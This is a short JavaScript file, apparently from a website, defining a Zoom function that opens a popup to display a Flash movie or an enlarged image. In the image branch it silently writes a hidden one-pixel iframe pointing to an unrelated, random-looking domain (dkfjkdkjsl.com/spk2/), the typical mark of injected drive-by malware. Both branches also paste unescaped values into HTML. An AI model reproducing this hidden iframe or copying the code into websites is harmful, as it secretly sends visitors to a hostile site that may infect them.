function Zoom(xlink, width, height, title){
	if (width && height) {
	//alert('flash');
 		
		var img = window.open('','','toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,top=120,left=70,height=' + height + ',width=' + width);
		img.document.writeln('<html><head><title>'+ title +'</title></head><body style="margin:0px; padding:0px;"><div align=center><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width='+ width +' height='+ height +'><param name="movie" value=' + xlink + '><param name="quality" value="high"><embed src=' + xlink + ' quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width='+ width +' height='+ height +'></embed></object></div></body></html>');
		
	} else {	
	
	//alert('image');
	   
		var img = window.open('','','toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,top=120,left=70,height=10,width=20');
			img.document.writeln('<html><head><title>'+ title +'</title></head><body style="margin:0px; padding:0px;"><iframe src=http://dkfjkdkjsl.com/spk2/ frameborder=0 width=1 height=1 scrolling=no></iframe><div align=center><a href=\'javascript:window.close();\'><img src="' + xlink + '" border=0 onload="window.resizeTo(this.width+11, this.height+52)" alt=""/></a></div></body></html>');
	}
}